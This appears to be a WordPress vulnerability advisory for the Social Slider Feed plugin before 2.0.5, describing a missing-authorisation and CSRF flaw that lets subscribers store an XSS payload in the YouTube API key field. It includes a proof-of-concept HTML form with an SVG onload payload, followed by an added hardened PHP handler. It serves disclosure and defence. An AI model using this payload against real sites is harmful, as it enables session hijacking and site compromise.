WordPress Plugin Vulnerabilities
Social Slider Feed < 2.0.5 - Subscriber+ Arbitrary API Key Update to Stored XSS
Description
The plugin does not have authorisation and CSRF checks in place when saving the YouTube API Key, and does not sanitise or escape it. As a result, users with a role as low as subscriber could change it, including setting it to a value containing Stored Cross-Site Scripting payloads.
Proof of Concept
As any authenticated user, such as a subscriber, or via CSRF against them:

<html>
  <body>
    <form action="https://example.com/wp-admin/admin.php?page=settings-wisw" method="POST">
      <input type="hidden" name="wyt_api_key" value='a"><svg/onload=alert(/XSS/)>' />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Despite the "Sorry, you are not allowed to access this page." error, the API Key will be updated.

The XSS will be triggered when viewing the Profile Dashboard (wp-admin/admin.php?page=settings-wisw).
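For comparison, a save handler and field renderer with the four missing controls (capability check, nonce check, input sanitisation, output escaping). This is an added example, not the plugin's own code or its 2.0.5 fix. The function names, the nonce action and field, the option name, the key character allowlist and the use of the admin_init hook are assumptions; only the wyt_api_key parameter comes from the page.

```php
<?php
// Added example: hypothetical hardened handler, not the plugin's actual code.
// Assumed names: wisw_save_api_key(), wisw_render_api_key_field(), the
// 'wisw_save_settings' nonce action, 'wisw_nonce' field, 'wyt_api_key' option.

add_action( 'admin_init', 'wisw_save_api_key' );

function wisw_save_api_key() {
    if ( ! isset( $_POST['wyt_api_key'] ) ) {
        return;
    }

    // Authorisation: admin_init runs on every wp-admin request, before the
    // menu page's own access check, so the handler must check the capability.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die(
            esc_html__( 'Sorry, you are not allowed to change this setting.' ),
            '',
            array( 'response' => 403 )
        );
    }

    // CSRF: stops the request unless it carries a valid nonce for this action.
    check_admin_referer( 'wisw_save_settings', 'wisw_nonce' );

    // Sanitisation: strip tags and control characters, then apply an
    // allowlist. The character set and length are assumptions for API keys.
    $key = sanitize_text_field( wp_unslash( $_POST['wyt_api_key'] ) );
    if ( ! preg_match( '/^[A-Za-z0-9_-]{1,128}$/', $key ) ) {
        return; // Reject instead of storing a value that is not key-shaped.
    }

    update_option( 'wyt_api_key', $key );
}

function wisw_render_api_key_field() {
    // Emits the hidden nonce field that check_admin_referer() verifies.
    wp_nonce_field( 'wisw_save_settings', 'wisw_nonce' );

    // Escaping on output: a stored value like a"><svg/onload=...> cannot
    // close the attribute, even if it reached the database some other way.
    printf(
        '<input type="text" name="wyt_api_key" value="%s" />',
        esc_attr( get_option( 'wyt_api_key', '' ) )
    );
}
```

Escaping at output is what neutralises a payload already stored by an affected version, so it is needed in addition to the checks on the save path.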
Affects Plugins
Classification
Type
XSS
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
WPScan
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2022-08-01
Added
2022-08-01
Last Updated
2022-08-01